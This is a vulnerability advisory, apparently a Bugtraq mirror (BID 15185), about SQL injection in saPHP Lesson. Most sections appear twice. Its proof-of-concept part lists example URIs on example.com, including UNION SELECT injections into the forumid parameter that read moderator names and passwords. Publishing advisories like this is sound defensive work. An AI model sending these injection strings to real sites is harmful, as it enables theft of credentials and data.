SAPHP Lesson Multiple Input Validation Vulnerabilities
BID:15185
Info
SAPHP Lesson Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15185 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 26 2005 12:00AM |
| Updated: | Oct 26 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
saPHP saPHP |
| Not Vulnerable: | |
Discussion
SAPHP Lesson Multiple Input Validation Vulnerabilities
saphp Lesson is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
saphp Lesson is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
SAPHP Lesson Multiple Input Validation Vulnerabilities
No exploit is required.
Example URI have been provided:
http://www.example.com/dros/showcat.php?forumid=|almaster
http://www.example.com/dros/add.php?forumid=|almaster
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModName%20FROM%20modretor
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor
No exploit is required.
Example URI have been provided:
http://www.example.com/dros/showcat.php?forumid=|almaster
http://www.example.com/dros/add.php?forumid=|almaster
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModName%20FROM%20modretor
http://www.example.com/dros/showcat.php?forumid=-1%20UNION%20SELECT%20ModPassword%20FROM%20modretor
Solution / Fix
SAPHP Lesson Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SAPHP Lesson Multiple Input Validation Vulnerabilities
References:
References:
- saPHP Web Site (saPHP)
- SQL saphp Lesson ([email protected])